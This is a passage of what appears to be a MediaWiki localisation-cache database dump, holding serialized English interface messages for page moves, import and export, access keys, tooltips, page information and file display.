choose another name.\";'),('en','messages:cantmove-titleprotected','s:94:\"You cannot move a page to this location because the new title has been protected from creation\";'),('en','messages:movetalk','s:25:\"Move associated talk page\";'),('en','messages:move-subpages','s:24:\"Move subpages (up to $1)\";'),('en','messages:move-talk-subpages','s:37:\"Move subpages of talk page (up to $1)\";'),('en','messages:movepage-page-exists','s:67:\"The page $1 already exists and cannot be automatically overwritten.\";'),('en','messages:movepage-page-moved','s:33:\"The page $1 has been moved to $2.\";'),('en','messages:movepage-page-unmoved','s:37:\"The page $1 could not be moved to $2.\";'),('en','messages:movepage-max-pages','s:98:\"The maximum of $1 {{PLURAL:$1|page|pages}} has been moved and no more will be moved automatically.\";'),('en','messages:movelogpage','s:8:\"Move log\";'),('en','messages:movelogpagetext','s:34:\"Below is a list of all page moves.\";'),('en','messages:movesubpage','s:30:\"{{PLURAL:$1|Subpage|Subpages}}\";'),('en','messages:movesubpagetext','s:60:\"This page has $1 {{PLURAL:$1|subpage|subpages}} shown below.\";'),('en','messages:movenosubpage','s:26:\"This page has no subpages.\";'),('en','messages:movereason','s:7:\"Reason:\";'),('en','messages:move-redirect-text','s:0:\"\";'),('en','messages:category-move-redirect-override','s:1:\"-\";'),('en','messages:revertmove','s:6:\"revert\";'),('en','messages:delete_and_move','s:15:\"Delete and move\";'),('en','messages:delete_and_move_text','s:121:\"== Deletion required ==\nThe destination page \"[[:$1]]\" already exists.\nDo you want to delete it to make way for the move?\";'),('en','messages:delete_and_move_confirm','s:20:\"Yes, delete the page\";'),('en','messages:delete_and_move_reason','s:42:\"Deleted to make way for move from \"[[$1]]\"\";'),('en','messages:selfmove','s:75:\"Source and destination titles are the same;\ncannot move a page over itself.\";'),('en','messages:immobile-source-namespace','s:35:\"Cannot move pages in namespace \"$1\"\";'),('en','messages:immobile-target-namespace','s:37:\"Cannot move pages into namespace \"$1\"\";'),('en','messages:immobile-target-namespace-iw','s:51:\"Interwiki link is not a valid target for page move.\";'),('en','messages:immobile-source-page','s:25:\"This page is not movable.\";'),('en','messages:immobile-target-page','s:38:\"Cannot move to that destination title.\";'),('en','messages:bad-target-model','s:85:\"The desired destination uses a different content model. Cannot convert from $1 to $2.\";'),('en','messages:imagenocrossnamespace','s:38:\"Cannot move file to non-file namespace\";'),('en','messages:nonfile-cannot-move-to-file','s:38:\"Cannot move non-file to file namespace\";'),('en','messages:imagetypemismatch','s:46:\"The new file extension does not match its type\";'),('en','messages:imageinvalidfilename','s:30:\"The target filename is invalid\";'),('en','messages:fix-double-redirects','s:53:\"Update any redirects that point to the original title\";'),('en','messages:move-leave-redirect','s:23:\"Leave a redirect behind\";'),('en','messages:protectedpagemovewarning','s:170:\"Warning: This page has been protected so that only users with administrator privileges can move it.\nThe latest log entry is provided below for reference:\";'),('en','messages:semiprotectedpagemovewarning','s:148:\"Note: This page has been protected so that only registered users can move it.\nThe latest log entry is provided below for reference:\";'),('en','messages:move-over-sharedrepo','s:115:\"== File exists ==\n[[:$1]] exists on a shared repository. Moving a file to this title will override the shared file.\";'),('en','messages:file-exists-sharedrepo','s:89:\"The filename chosen is already in use on a shared repository.\nPlease choose another name.\";'),('en','messages:export','s:12:\"Export pages\";'),('en','messages:export-summary','s:0:\"\";'),('en','messages:exporttext','s:588:\"You can export the text and editing history of a particular page or set of pages wrapped in some XML.\nThis can be imported into another wiki using MediaWiki via the [[Special:Import|import page]].\n\nTo export pages, enter the titles in the text box below, one title per line, and select whether you want the current revision as well as all old revisions, with the page history lines, or the current revision with the info about the last edit.\n\nIn the latter case you can also use a link, for example [[{{#Special:Export}}/{{MediaWiki:Mainpage}}]] for the page \"[[{{MediaWiki:Mainpage}}]]\".\";'),('en','messages:exportall','s:16:\"Export all pages\";'),('en','messages:exportcuronly','s:55:\"Include only the current revision, not the full history\";'),('en','messages:exportnohistory','s:127:\"----\nNote: Exporting the full history of pages through this form has been disabled due to performance reasons.\";'),('en','messages:exportlistauthors','s:49:\"Include a full list of contributors for each page\";'),('en','messages:export-submit','s:6:\"Export\";'),('en','messages:export-addcattext','s:24:\"Add pages from category:\";'),('en','messages:export-addcat','s:3:\"Add\";'),('en','messages:export-addnstext','s:25:\"Add pages from namespace:\";'),('en','messages:export-addns','s:3:\"Add\";'),('en','messages:export-download','s:12:\"Save as file\";'),('en','messages:export-templates','s:17:\"Include templates\";'),('en','messages:export-pagelinks','s:35:\"Include linked pages to a depth of:\";'),('en','messages:allmessages','s:15:\"System messages\";'),('en','messages:allmessagesname','s:4:\"Name\";'),('en','messages:allmessagesdefault','s:20:\"Default message text\";'),('en','messages:allmessagescurrent','s:20:\"Current message text\";'),('en','messages:allmessagestext','s:281:\"This is a list of system messages available in the MediaWiki namespace.\nPlease visit [https://www.mediawiki.org/wiki/Special:MyLanguage/Localisation MediaWiki Localisation] and [//translatewiki.net translatewiki.net] if you wish to contribute to the generic MediaWiki localisation.\";'),('en','messages:allmessagesnotsupportedDB','s:91:\"This page cannot be used because $wgUseDatabaseMessages has been disabled.\";'),('en','messages:allmessages-filter-legend','s:6:\"Filter\";'),('en','messages:allmessages-filter','s:30:\"Filter by customization state:\";'),('en','messages:allmessages-filter-unmodified','s:10:\"Unmodified\";'),('en','messages:allmessages-filter-all','s:3:\"All\";'),('en','messages:allmessages-filter-modified','s:8:\"Modified\";'),('en','messages:allmessages-prefix','s:17:\"Filter by prefix:\";'),('en','messages:allmessages-language','s:9:\"Language:\";'),('en','messages:allmessages-filter-submit','s:2:\"Go\";'),('en','messages:allmessages-filter-translate','s:9:\"Translate\";'),('en','messages:thumbnail-more','s:7:\"Enlarge\";'),('en','messages:filemissing','s:12:\"File missing\";'),('en','messages:thumbnail_error','s:28:\"Error creating thumbnail: $1\";'),('en','messages:thumbnail_error_remote','s:25:\"Error message from $1:\n$2\";'),('en','messages:djvu_page_error','s:22:\"DjVu page out of range\";'),('en','messages:djvu_no_xml','s:33:\"Unable to fetch XML for DjVu file\";'),('en','messages:thumbnail-temp-create','s:41:\"Unable to create temporary thumbnail file\";'),('en','messages:thumbnail-dest-create','s:39:\"Unable to save thumbnail to destination\";'),('en','messages:thumbnail_invalid_params','s:28:\"Invalid thumbnail parameters\";'),('en','messages:thumbnail_dest_directory','s:38:\"Unable to create destination directory\";'),('en','messages:thumbnail_image-type','s:24:\"Image type not supported\";'),('en','messages:thumbnail_gd-library','s:56:\"Incomplete GD library configuration: Missing function $1\";'),('en','messages:thumbnail_image-missing','s:28:\"File seems to be missing: $1\";'),('en','messages:thumbnail_image-failure-limit','s:110:\"There have been too many recent failed attempts ($1 or more) to render this thumbnail. Please try again later.\";'),('en','messages:import','s:12:\"Import pages\";'),('en','messages:import-summary','s:0:\"\";'),('en','messages:importinterwiki','s:16:\"Transwiki import\";'),('en','messages:import-interwiki-text','s:174:\"Select a wiki and page title to import.\nRevision dates and editors\' names will be preserved.\nAll transwiki import actions are logged at the [[Special:Log/import|import log]].\";'),('en','messages:import-interwiki-sourcewiki','s:12:\"Source wiki:\";'),('en','messages:import-interwiki-sourcepage','s:12:\"Source page:\";'),('en','messages:import-interwiki-history','s:40:\"Copy all history revisions for this page\";'),('en','messages:import-interwiki-templates','s:21:\"Include all templates\";'),('en','messages:import-interwiki-submit','s:6:\"Import\";'),('en','messages:import-interwiki-namespace','s:22:\"Destination namespace:\";'),('en','messages:import-interwiki-rootpage','s:33:\"Destination root page (optional):\";'),('en','messages:import-upload-filename','s:9:\"Filename:\";'),('en','messages:import-comment','s:8:\"Comment:\";'),('en','messages:importtext','s:133:\"Please export the file from the source wiki using the [[Special:Export|export utility]].\nSave it to your computer and upload it here.\";'),('en','messages:importstart','s:18:\"Importing pages...\";'),('en','messages:import-revision-count','s:35:\"$1 {{PLURAL:$1|revision|revisions}}\";'),('en','messages:importnopages','s:19:\"No pages to import.\";'),('en','messages:imported-log-entries','s:48:\"Imported $1 {{PLURAL:$1|log entry|log entries}}.\";'),('en','messages:importfailed','s:34:\"Import failed: $1\";'),('en','messages:importunknownsource','s:26:\"Unknown import source type\";'),('en','messages:importcantopen','s:26:\"Could not open import file\";'),('en','messages:importbadinterwiki','s:18:\"Bad interwiki link\";'),('en','messages:importsuccess','s:16:\"Import finished!\";'),('en','messages:importnosources','s:86:\"No transwiki import sources have been defined and direct history uploads are disabled.\";'),('en','messages:importnofile','s:28:\"No import file was uploaded.\";'),('en','messages:importuploaderrorsize','s:78:\"Upload of import file failed.\nThe file is bigger than the allowed upload size.\";'),('en','messages:importuploaderrorpartial','s:67:\"Upload of import file failed.\nThe file was only partially uploaded.\";'),('en','messages:importuploaderrortemp','s:60:\"Upload of import file failed.\nA temporary folder is missing.\";'),('en','messages:import-parse-failure','s:24:\"XML import parse failure\";'),('en','messages:import-noarticle','s:18:\"No page to import!\";'),('en','messages:import-nonewrevisions','s:82:\"No revisions imported (all were either already present, or skipped due to errors).\";'),('en','messages:xml-error-string','s:35:\"$1 at line $2, col $3 (byte $4): $5\";'),('en','messages:import-upload','s:15:\"Upload XML data\";'),('en','messages:import-token-mismatch','s:39:\"Loss of session data.\nPlease try again.\";'),('en','messages:import-invalid-interwiki','s:38:\"Cannot import from the specified wiki.\";'),('en','messages:import-error-edit','s:66:\"Page \"$1\" was not imported because you are not allowed to edit it.\";'),('en','messages:import-error-create','s:68:\"Page \"$1\" was not imported because you are not allowed to create it.\";'),('en','messages:import-error-interwiki','s:89:\"Page \"$1\" was not imported because its name is reserved for external linking (interwiki).\";'),('en','messages:import-error-special','s:95:\"Page \"$1\" was not imported because it belongs to a special namespace that does not allow pages.\";'),('en','messages:import-error-invalid','s:98:\"Page \"$1\" was not imported because the name to which it would be imported is invalid on this wiki.\";'),('en','messages:import-error-unserialize','s:119:\"Revision $2 of page \"$1\" could not be unserialized. The revision was reported to use content model $3 serialized as $4.\";'),('en','messages:import-error-bad-location','s:121:\"Revision $2 using content model $3 cannot be stored on \"$1\" on this wiki, since that model is not supported on that page.\";'),('en','messages:import-options-wrong','s:55:\"Wrong {{PLURAL:$2|option|options}}: $1\";'),('en','messages:import-rootpage-invalid','s:36:\"Given root page is an invalid title.\";'),('en','messages:import-rootpage-nosubpage','s:56:\"Namespace \"$1\" of the root page does not allow subpages.\";'),('en','messages:importlogpage','s:10:\"Import log\";'),('en','messages:importlogpagetext','s:67:\"Administrative imports of pages with edit history from other wikis.\";'),('en','messages:import-logentry-upload','s:30:\"imported [[$1]] by file upload\";'),('en','messages:import-logentry-upload-detail','s:44:\"$1 {{PLURAL:$1|revision|revisions}} imported\";'),('en','messages:import-logentry-interwiki','s:14:\"transwikied $1\";'),('en','messages:import-logentry-interwiki-detail','s:52:\"$1 {{PLURAL:$1|revision|revisions}} imported from $2\";'),('en','messages:javascripttest','s:18:\"JavaScript testing\";'),('en','messages:javascripttest-backlink','s:4:\"< $1\";'),('en','messages:javascripttest-title','s:2:\"$1\";'),('en','messages:javascripttest-pagetext-noframework','s:51:\"This page is reserved for running JavaScript tests.\";'),('en','messages:javascripttest-pagetext-unknownframework','s:31:\"Unknown testing framework \"$1\".\";'),('en','messages:javascripttest-pagetext-unknownaction','s:20:\"Unknown action \"$1\".\";'),('en','messages:javascripttest-pagetext-frameworks','s:57:\"Please choose one of the following testing frameworks: $1\";'),('en','messages:javascripttest-pagetext-skins','s:36:\"Choose a skin to run the tests with:\";'),('en','messages:javascripttest-qunit-name','s:5:\"QUnit\";'),('en','messages:javascripttest-qunit-intro','s:48:\"See [$1 testing documentation] on mediawiki.org.\";'),('en','messages:accesskey-pt-userpage','s:1:\".\";'),('en','messages:accesskey-pt-anonuserpage','s:1:\".\";'),('en','messages:accesskey-pt-mytalk','s:1:\"n\";'),('en','messages:accesskey-pt-anontalk','s:1:\"n\";'),('en','messages:accesskey-pt-preferences','s:0:\"\";'),('en','messages:accesskey-pt-watchlist','s:1:\"l\";'),('en','messages:accesskey-pt-mycontris','s:1:\"y\";'),('en','messages:accesskey-pt-login','s:1:\"o\";'),('en','messages:accesskey-pt-logout','s:0:\"\";'),('en','messages:accesskey-ca-talk','s:1:\"t\";'),('en','messages:accesskey-ca-edit','s:1:\"e\";'),('en','messages:accesskey-ca-addsection','s:1:\"+\";'),('en','messages:accesskey-ca-viewsource','s:1:\"e\";'),('en','messages:accesskey-ca-history','s:1:\"h\";'),('en','messages:accesskey-ca-protect','s:1:\"=\";'),('en','messages:accesskey-ca-unprotect','s:1:\"=\";'),('en','messages:accesskey-ca-delete','s:1:\"d\";'),('en','messages:accesskey-ca-undelete','s:1:\"d\";'),('en','messages:accesskey-ca-move','s:1:\"m\";'),('en','messages:accesskey-ca-watch','s:1:\"w\";'),('en','messages:accesskey-ca-unwatch','s:1:\"w\";'),('en','messages:accesskey-search','s:1:\"f\";'),('en','messages:accesskey-search-go','s:0:\"\";'),('en','messages:accesskey-search-fulltext','s:0:\"\";'),('en','messages:accesskey-p-logo','s:0:\"\";'),('en','messages:accesskey-n-mainpage','s:1:\"z\";'),('en','messages:accesskey-n-mainpage-description','s:1:\"z\";'),('en','messages:accesskey-n-portal','s:0:\"\";'),('en','messages:accesskey-n-currentevents','s:0:\"\";'),('en','messages:accesskey-n-recentchanges','s:1:\"r\";'),('en','messages:accesskey-n-randompage','s:1:\"x\";'),('en','messages:accesskey-n-help','s:0:\"\";'),('en','messages:accesskey-t-whatlinkshere','s:1:\"j\";'),('en','messages:accesskey-t-recentchangeslinked','s:1:\"k\";'),('en','messages:accesskey-feed-rss','s:0:\"\";'),('en','messages:accesskey-feed-atom','s:0:\"\";'),('en','messages:accesskey-t-contributions','s:0:\"\";'),('en','messages:accesskey-t-emailuser','s:0:\"\";'),('en','messages:accesskey-t-permalink','s:0:\"\";'),('en','messages:accesskey-t-print','s:1:\"p\";'),('en','messages:accesskey-t-upload','s:1:\"u\";'),('en','messages:accesskey-t-specialpages','s:1:\"q\";'),('en','messages:accesskey-ca-nstab-main','s:1:\"c\";'),('en','messages:accesskey-ca-nstab-user','s:1:\"c\";'),('en','messages:accesskey-ca-nstab-media','s:1:\"c\";'),('en','messages:accesskey-ca-nstab-special','s:0:\"\";'),('en','messages:accesskey-ca-nstab-project','s:1:\"a\";'),('en','messages:accesskey-ca-nstab-image','s:1:\"c\";'),('en','messages:accesskey-ca-nstab-mediawiki','s:1:\"c\";'),('en','messages:accesskey-ca-nstab-template','s:1:\"c\";'),('en','messages:accesskey-ca-nstab-help','s:1:\"c\";'),('en','messages:accesskey-ca-nstab-category','s:1:\"c\";'),('en','messages:accesskey-minoredit','s:1:\"i\";'),('en','messages:accesskey-save','s:1:\"s\";'),('en','messages:accesskey-preview','s:1:\"p\";'),('en','messages:accesskey-diff','s:1:\"v\";'),('en','messages:accesskey-compareselectedversions','s:1:\"v\";'),('en','messages:accesskey-watch','s:1:\"w\";'),('en','messages:accesskey-upload','s:1:\"s\";'),('en','messages:accesskey-preferences-save','s:1:\"s\";'),('en','messages:accesskey-summary','s:1:\"b\";'),('en','messages:accesskey-userrights-set','s:1:\"s\";'),('en','messages:accesskey-blockip-block','s:1:\"s\";'),('en','messages:accesskey-export','s:1:\"s\";'),('en','messages:accesskey-import','s:1:\"s\";'),('en','messages:accesskey-watchlistedit-normal-submit','s:1:\"s\";'),('en','messages:accesskey-watchlistedit-raw-submit','s:1:\"s\";'),('en','messages:tooltip-pt-userpage','s:14:\"Your user page\";'),('en','messages:tooltip-pt-anonuserpage','s:51:\"The user page for the IP address you are editing as\";'),('en','messages:tooltip-pt-mytalk','s:14:\"Your talk page\";'),('en','messages:tooltip-pt-anontalk','s:43:\"Discussion about edits from this IP address\";'),('en','messages:tooltip-pt-preferences','s:16:\"Your preferences\";'),('en','messages:tooltip-pt-watchlist','s:46:\"A list of pages you are monitoring for changes\";'),('en','messages:tooltip-pt-mycontris','s:28:\"A list of your contributions\";'),('en','messages:tooltip-pt-login','s:58:\"You are encouraged to log in; however, it is not mandatory\";'),('en','messages:tooltip-pt-logout','s:7:\"Log out\";'),('en','messages:tooltip-ca-talk','s:33:\"Discussion about the content page\";'),('en','messages:tooltip-ca-edit','s:67:\"You can edit this page. Please use the preview button before saving\";'),('en','messages:tooltip-ca-addsection','s:19:\"Start a new section\";'),('en','messages:tooltip-ca-viewsource','s:47:\"This page is protected.\nYou can view its source\";'),('en','messages:tooltip-ca-history','s:27:\"Past revisions of this page\";'),('en','messages:tooltip-ca-protect','s:17:\"Protect this page\";'),('en','messages:tooltip-ca-unprotect','s:30:\"Change protection of this page\";'),('en','messages:tooltip-ca-delete','s:16:\"Delete this page\";'),('en','messages:tooltip-ca-undelete','s:57:\"Restore the edits done to this page before it was deleted\";'),('en','messages:tooltip-ca-move','s:14:\"Move this page\";'),('en','messages:tooltip-ca-watch','s:31:\"Add this page to your watchlist\";'),('en','messages:tooltip-ca-unwatch','s:36:\"Remove this page from your watchlist\";'),('en','messages:tooltip-search','s:19:\"Search {{SITENAME}}\";'),('en','messages:tooltip-search-go','s:43:\"Go to a page with this exact name if exists\";'),('en','messages:tooltip-search-fulltext','s:30:\"Search the pages for this text\";'),('en','messages:tooltip-p-logo','s:19:\"Visit the main page\";'),('en','messages:tooltip-n-mainpage','s:19:\"Visit the main page\";'),('en','messages:tooltip-n-mainpage-description','s:19:\"Visit the main page\";'),('en','messages:tooltip-n-portal','s:56:\"About the project, what you can do, where to find things\";'),('en','messages:tooltip-n-currentevents','s:45:\"Find background information on current events\";'),('en','messages:tooltip-n-recentchanges','s:36:\"A list of recent changes in the wiki\";'),('en','messages:tooltip-n-randompage','s:18:\"Load a random page\";'),('en','messages:tooltip-n-help','s:21:\"The place to find out\";'),('en','messages:tooltip-t-whatlinkshere','s:39:\"A list of all wiki pages that link here\";'),('en','messages:tooltip-t-recentchangeslinked','s:45:\"Recent changes in pages linked from this page\";'),('en','messages:tooltip-feed-rss','s:22:\"RSS feed for this page\";'),('en','messages:tooltip-feed-atom','s:23:\"Atom feed for this page\";'),('en','messages:tooltip-t-contributions','s:36:\"A list of contributions of this user\";'),('en','messages:tooltip-t-emailuser','s:26:\"Send an email to this user\";'),('en','messages:tooltip-t-upload','s:12:\"Upload files\";'),('en','messages:tooltip-t-specialpages','s:27:\"A list of all special pages\";'),('en','messages:tooltip-t-print','s:30:\"Printable version of this page\";'),('en','messages:tooltip-t-permalink','s:43:\"Permanent link to this revision of the page\";'),('en','messages:tooltip-ca-nstab-main','s:21:\"View the content page\";'),('en','messages:tooltip-ca-nstab-user','s:18:\"View the user page\";'),('en','messages:tooltip-ca-nstab-media','s:19:\"View the media page\";'),('en','messages:tooltip-ca-nstab-special','s:55:\"This is a special page, you cannot edit the page itself\";'),('en','messages:tooltip-ca-nstab-project','s:21:\"View the project page\";'),('en','messages:tooltip-ca-nstab-image','s:18:\"View the file page\";'),('en','messages:tooltip-ca-nstab-mediawiki','s:23:\"View the system message\";'),('en','messages:tooltip-ca-nstab-template','s:17:\"View the template\";'),('en','messages:tooltip-ca-nstab-help','s:18:\"View the help page\";'),('en','messages:tooltip-ca-nstab-category','s:22:\"View the category page\";'),('en','messages:tooltip-minoredit','s:25:\"Mark this as a minor edit\";'),('en','messages:tooltip-save','s:17:\"Save your changes\";'),('en','messages:tooltip-preview','s:52:\"Preview your changes, please use this before saving!\";'),('en','messages:tooltip-diff','s:39:\"Show which changes you made to the text\";'),('en','messages:tooltip-compareselectedversions','s:67:\"See the differences between the two selected revisions of this page\";'),('en','messages:tooltip-watch','s:31:\"Add this page to your watchlist\";'),('en','messages:tooltip-watchlistedit-normal-submit','s:13:\"Remove titles\";'),('en','messages:tooltip-watchlistedit-raw-submit','s:16:\"Update watchlist\";'),('en','messages:tooltip-recreate','s:49:\"Recreate the page even though it has been deleted\";'),('en','messages:tooltip-upload','s:12:\"Start upload\";'),('en','messages:tooltip-rollback','s:76:\"\"Rollback\" reverts edit(s) to this page of the last contributor in one click\";'),('en','messages:tooltip-undo','s:107:\"\"Undo\" reverts this edit and opens the edit form in preview mode. It allows adding a reason in the summary.\";'),('en','messages:tooltip-preferences-save','s:16:\"Save preferences\";'),('en','messages:tooltip-summary','s:21:\"Enter a short summary\";'),('en','messages:interlanguage-link-title','s:9:\"$1 – $2\";'),('en','messages:interlanguage-link-title-langonly','s:2:\"$1\";'),('en','messages:interlanguage-link-title-nonlang','s:9:\"$1 – $2\";'),('en','messages:interlanguage-link-title-nonlangonly','s:2:\"$1\";'),('en','messages:common.css','s:50:\"/* CSS placed here will be applied to all skins */\";'),('en','messages:print.css','s:50:\"/* CSS placed here will affect the print output */\";'),('en','messages:noscript.css','s:64:\"/* CSS placed here will affect users with JavaScript disabled */\";'),('en','messages:group-autoconfirmed.css','s:58:\"/* CSS placed here will affect autoconfirmed users only */\";'),('en','messages:group-user.css','s:55:\"/* CSS placed here will affect registered users only */\";'),('en','messages:group-bot.css','s:43:\"/* CSS placed here will affect bots only */\";'),('en','messages:group-sysop.css','s:45:\"/* CSS placed here will affect sysops only */\";'),('en','messages:group-bureaucrat.css','s:50:\"/* CSS placed here will affect bureaucrats only */\";'),('en','messages:common.js','s:74:\"/* Any JavaScript here will be loaded for all users on every page load. */\";'),('en','messages:group-autoconfirmed.js','s:69:\"/* Any JavaScript here will be loaded for autoconfirmed users only */\";'),('en','messages:group-user.js','s:66:\"/* Any JavaScript here will be loaded for registered users only */\";'),('en','messages:group-bot.js','s:54:\"/* Any JavaScript here will be loaded for bots only */\";'),('en','messages:group-sysop.js','s:56:\"/* Any JavaScript here will be loaded for sysops only */\";'),('en','messages:group-bureaucrat.js','s:61:\"/* Any JavaScript here will be loaded for bureaucrats only */\";'),('en','messages:anonymous','s:50:\"Anonymous {{PLURAL:$1|user|users}} of {{SITENAME}}\";'),('en','messages:siteuser','s:20:\"{{SITENAME}} user $1\";'),('en','messages:anonuser','s:30:\"{{SITENAME}} anonymous user $1\";'),('en','messages:lastmodifiedatby','s:41:\"This page was last modified $2, $1 by $3.\";'),('en','messages:othercontribs','s:20:\"Based on work by $1.\";'),('en','messages:others','s:6:\"others\";'),('en','messages:siteusers','s:40:\"{{SITENAME}} {{PLURAL:$2|user|users}} $1\";'),('en','messages:anonusers','s:50:\"{{SITENAME}} anonymous {{PLURAL:$2|user|users}} $1\";'),('en','messages:creditspage','s:12:\"Page credits\";'),('en','messages:nocredits','s:49:\"There is no credits info available for this page.\";'),('en','messages:spamprotectiontitle','s:22:\"Spam protection filter\";'),('en','messages:spamprotectiontext','s:125:\"The text you wanted to save was blocked by the spam filter.\nThis is probably caused by a link to a blacklisted external site.\";'),('en','messages:spamprotectionmatch','s:56:\"The following text is what triggered our spam filter: $1\";'),('en','messages:spambot_username','s:22:\"MediaWiki spam cleanup\";'),('en','messages:spam_reverting','s:53:\"Reverting to last revision not containing links to $1\";'),('en','messages:spam_blanking','s:45:\"All revisions contained links to $1, blanking\";'),('en','messages:spam_deleting','s:45:\"All revisions contained links to $1, deleting\";'),('en','messages:simpleantispam-label','s:54:\"Anti-spam check.\nDo NOT fill this in!\";'),('en','messages:pageinfo-header','s:1:\"-\";'),('en','messages:pageinfo-title','s:20:\"Information for \"$1\"\";'),('en','messages:pageinfo-not-current','s:69:\"Sorry, it\'s impossible to provide this information for old revisions.\";'),('en','messages:pageinfo-header-basic','s:17:\"Basic information\";'),('en','messages:pageinfo-header-edits','s:12:\"Edit history\";'),('en','messages:pageinfo-header-restrictions','s:15:\"Page protection\";'),('en','messages:pageinfo-header-properties','s:15:\"Page properties\";'),('en','messages:pageinfo-display-title','s:13:\"Display title\";'),('en','messages:pageinfo-default-sort','s:16:\"Default sort key\";'),('en','messages:pageinfo-length','s:22:\"Page length (in bytes)\";'),('en','messages:pageinfo-article-id','s:7:\"Page ID\";'),('en','messages:pageinfo-language','s:21:\"Page content language\";'),('en','messages:pageinfo-content-model','s:18:\"Page content model\";'),('en','messages:pageinfo-robot-policy','s:18:\"Indexing by robots\";'),('en','messages:pageinfo-robot-index','s:7:\"Allowed\";'),('en','messages:pageinfo-robot-noindex','s:10:\"Disallowed\";'),('en','messages:pageinfo-views','s:15:\"Number of views\";'),('en','messages:pageinfo-watchers','s:23:\"Number of page watchers\";'),('en','messages:pageinfo-few-watchers','s:44:\"Fewer than $1 {{PLURAL:$1|watcher|watchers}}\";'),('en','messages:pageinfo-redirects-name','s:32:\"Number of redirects to this page\";'),('en','messages:pageinfo-redirects-value','s:2:\"$1\";'),('en','messages:pageinfo-subpages-name','s:31:\"Number of subpages of this page\";'),('en','messages:pageinfo-subpages-value','s:85:\"$1 ($2 {{PLURAL:$2|redirect|redirects}}; $3 {{PLURAL:$3|non-redirect|non-redirects}})\";'),('en','messages:pageinfo-firstuser','s:12:\"Page creator\";'),('en','messages:pageinfo-firsttime','s:21:\"Date of page creation\";'),('en','messages:pageinfo-lastuser','s:13:\"Latest editor\";'),('en','messages:pageinfo-lasttime','s:19:\"Date of latest edit\";'),('en','messages:pageinfo-edits','s:21:\"Total number of edits\";'),('en','messages:pageinfo-authors','s:32:\"Total number of distinct authors\";'),('en','messages:pageinfo-recent-edits','s:39:\"Recent number of edits (within past $1)\";'),('en','messages:pageinfo-recent-authors','s:33:\"Recent number of distinct authors\";'),('en','messages:pageinfo-magic-words','s:35:\"Magic {{PLURAL:$1|word|words}} ($1)\";'),('en','messages:pageinfo-hidden-categories','s:45:\"Hidden {{PLURAL:$1|category|categories}} ($1)\";'),('en','messages:pageinfo-templates','s:49:\"Transcluded {{PLURAL:$1|template|templates}} ($1)\";'),('en','messages:pageinfo-transclusions','s:44:\"{{PLURAL:$1|Page|Pages}} transcluded on ($1)\";'),('en','messages:pageinfo-footer','s:1:\"-\";'),('en','messages:pageinfo-toolboxlink','s:16:\"Page information\";'),('en','messages:pageinfo-redirectsto','s:12:\"Redirects to\";'),('en','messages:pageinfo-redirectsto-info','s:4:\"info\";'),('en','messages:pageinfo-contentpage','s:25:\"Counted as a content page\";'),('en','messages:pageinfo-contentpage-yes','s:3:\"Yes\";'),('en','messages:pageinfo-protect-cascading','s:35:\"Protections are cascading from here\";'),('en','messages:pageinfo-protect-cascading-yes','s:3:\"Yes\";'),('en','messages:pageinfo-protect-cascading-from','s:30:\"Protections are cascading from\";'),('en','messages:pageinfo-category-info','s:20:\"Category information\";'),('en','messages:pageinfo-category-pages','s:15:\"Number of pages\";'),('en','messages:pageinfo-category-subcats','s:23:\"Number of subcategories\";'),('en','messages:pageinfo-category-files','s:15:\"Number of files\";'),('en','messages:markaspatrolleddiff','s:17:\"Mark as patrolled\";'),('en','messages:markaspatrolledlink','s:4:\"[$1]\";'),('en','messages:markaspatrolledtext','s:27:\"Mark this page as patrolled\";'),('en','messages:markedaspatrolled','s:19:\"Marked as patrolled\";'),('en','messages:markedaspatrolledtext','s:62:\"The selected revision of [[:$1]] has been marked as patrolled.\";'),('en','messages:rcpatroldisabled','s:30:\"Recent changes patrol disabled\";'),('en','messages:rcpatroldisabledtext','s:56:\"The recent changes patrol feature is currently disabled.\";'),('en','messages:markedaspatrollederror','s:24:\"Cannot mark as patrolled\";'),('en','messages:markedaspatrollederrortext','s:52:\"You need to specify a revision to mark as patrolled.\";'),('en','messages:markedaspatrollederror-noautopatrol','s:58:\"You are not allowed to mark your own changes as patrolled.\";'),('en','messages:markedaspatrollednotify','s:47:\"This change to $1 has been marked as patrolled.\";'),('en','messages:markedaspatrollederrornotify','s:28:\"Marking as patrolled failed.\";'),('en','messages:patrol-log-page','s:10:\"Patrol log\";'),('en','messages:patrol-log-header','s:37:\"This is a log of patrolled revisions.\";'),('en','messages:log-show-hide-patrol','s:13:\"$1 patrol log\";'),('en','messages:deletedrevision','s:23:\"Deleted old revision $1\";'),('en','messages:filedeleteerror-short','s:23:\"Error deleting file: $1\";'),('en','messages:filedeleteerror-long','s:52:\"Errors were encountered while deleting the file:\n\n$1\";'),('en','messages:filedelete-missing','s:58:\"The file \"$1\" cannot be deleted because it does not exist.\";'),('en','messages:filedelete-old-unregistered','s:56:\"The specified file revision \"$1\" is not in the database.\";'),('en','messages:filedelete-current-unregistered','s:47:\"The specified file \"$1\" is not in the database.\";'),('en','messages:filedelete-archive-read-only','s:60:\"The archive directory \"$1\" is not writable by the webserver.\";'),('en','messages:previousdiff','s:14:\"← Older edit\";'),('en','messages:nextdiff','s:14:\"Newer edit →\";'),('en','messages:mediawarning','s:117:\"Warning: This file type may contain malicious code.\nBy executing it, your system may be compromised.\";'),('en','messages:imagemaxsize','s:60:\"Image size limit:
                                                                (for file description pages)\";'),('en','messages:thumbsize','s:15:\"Thumbnail size:\";'),('en','messages:widthheight','s:8:\"$1 × $2\";'),('en','messages:widthheightpage','s:37:\"$1 × $2, $3 {{PLURAL:$3|page|pages}}\";'),('en','messages:file-info','s:28:\"file size: $1, MIME type: $2\";'),('en','messages:file-info-size','s:45:\"$1 × $2 pixels, file size: $3, MIME type: $4\";'),('en','messages:file-info-size-pages','s:74:\"$1 × $2 pixels, file size: $3, MIME type: $4, $5 {{PLURAL:$5|page|pages}}\";'),('en','messages:file-nohires','s:31:\"No higher resolution available.\";'),('en','messages:svg-long-desc','s:50:\"SVG file, nominally $1 × $2 pixels, file size: $3\";'),('en','messages:svg-long-desc-animated','s:59:\"Animated SVG file, nominally $1 × $2 pixels, file size: $3\";'),('en','messages:svg-long-error','s:20:\"Invalid SVG file: $1\";'),('en','messages:show-big-image','s:13:\"Original file\";'),('en','messages:show-big-image-preview','s:25:\"Size of this preview: $1.\";'),('en','messages:show-big-image-other','s:47:\"Other {{PLURAL:$2|resolution|resolutions}}: $1.\";'),('en','messages:show-big-image-size','s:15:\"$1 × $2 pixels\";'),('en','messages:file-info-gif-looped','s:6:\"looped\";'),('en','messages:file-info-gif-frames','s:29:\"$1 